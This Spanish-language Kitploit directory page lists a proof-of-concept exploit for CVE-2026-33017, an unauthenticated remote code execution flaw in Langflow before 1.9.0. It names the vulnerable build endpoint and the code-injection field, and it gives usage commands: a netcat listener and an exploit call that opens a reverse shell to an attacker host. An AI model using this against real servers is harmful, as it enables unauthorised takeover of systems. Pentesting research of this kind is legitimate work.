Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33017-Langflow-RCE — Exploit CVE-2026-33017 | por infrar3d | Kitploit
Herramientas/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce

CVE-2026-33017-Langflow-RCE

Exploit CVE-2026-33017 | por infrar3d

Ver Repositorio
111hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-33017 - Vulnerabilidad RCE en Langflow

Explotado por infrar3d

Este exploit de prueba de concepto apunta a una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en versiones de Langflow anteriores a la 1.9.0. La vulnerabilidad permite a atacantes no autenticados ejecutar comandos arbitrarios del sistema inyectando código Python malicioso a través del endpoint de la API de construcción de flujos. La vulnerabilidad existe en el endpoint /api/v1/build_public_tmp/{flow_id}/flow endpoint, que sanea incorrectamente el código proporcionado por el usuario en el campo code de las plantillas de componentes.

Uso:

root@kitploit:~
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]

Langflow RCE Exploit

options:
  -h, --help       show this help message and exit
  -u, --url URL    Target base URL
  -f, --flow FLOW  Flow ID
  -H, --host HOST  Listener host for reverse shell
  -P, --port PORT  Listener port (default: 4444)
                                         

Ejemplo:

La primera terminal (listener):

root@kitploit:~
nc -lvnp 4444

La segunda terminal (exploit):

root@kitploit:~
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444 

⚠️ Descargo de responsabilidad ⚠️

Este software y el código de prueba de concepto se proporcionan solo con fines educativos y de investigación.

  • Los autores no son responsables de ningún uso indebido o daño causado por este programa.
  • No lo utilice contra ningún sistema sin un permiso previo explícito.
  • El uso de esta herramienta para atacar objetivos sin consentimiento es ilegal.

Usted es responsable de cumplir con todas las leyes aplicables. Úsela de forma ética y responsable.

Descargar herramienta